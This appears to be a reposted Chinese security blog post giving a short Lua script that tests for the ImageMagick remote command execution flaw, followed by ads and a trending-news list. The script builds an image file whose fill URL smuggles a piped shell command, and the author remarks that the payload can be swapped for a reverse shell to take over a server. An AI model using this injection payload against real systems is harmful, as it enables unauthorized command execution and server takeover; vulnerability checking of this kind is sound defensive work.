Sevck:ImageMagick远程命令执行工具检测工具
ImageMagick这个漏洞昨天晚上就出来了,今天才有时间研究一下,今天自己也测试了一下
效果图:
用lua写了一个检测脚本
1 print ("Checking...")
2 file=io.open("exp.jpg","w")
3 --file:write("s")
4 file:write("push graphic-context\r\nviewbox 0 0 640 480\r\n")
5 file:write("fill 'url(https://example.com/image.jpg")
6 file:write('"|echo "success!!!)')
7 file:write("'\r\n")
8 file:write("pop graphic-context")
9 file:close()
10 cmd=io.popen("convert exp.jpg test.png")
11 result=cmd:read("*all")
12 print(result)
如果存在返回
s
当然playload自己改吧,可以直接反弹个shell回来,直接拿到服务器权限
附上一篇分析文章:
http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462399591384&from=groupmessage&isappinstalled=0
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
![柏曌婷1111平凡的日子也很sweet[熊猫] ](https://imgs.knowsafe.com:8087/img/aideep/2023/1/9/e5fbf9dc8bbe4a0138e2e2121f72ec02.jpg?w=250)
站内编辑
关注网络尖刀微信公众号随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 很重要的是看老年人幸福不幸福 7904192
- 2 广东省委副书记:迅速进入临战状态 7807986
- 3 钱塘江现大面积“龙鳞潮” 7712962
- 4 本世纪最晚中秋来了 7619288
- 5 昔日顶流“拉面哥”已转型带货主播 7523307
- 6 丈夫反对投资120万女子生气砸断餐桌 7424742
- 7 新郎新娘还堵在高速 家里先开席了 7332226
- 8 男子收3.5万报酬运送市值1.46亿毒品 7234936
- 9 AI女演员震动好莱坞 7141751
- 10 女生瀑布前拍照 空中飘来一排人 7049001
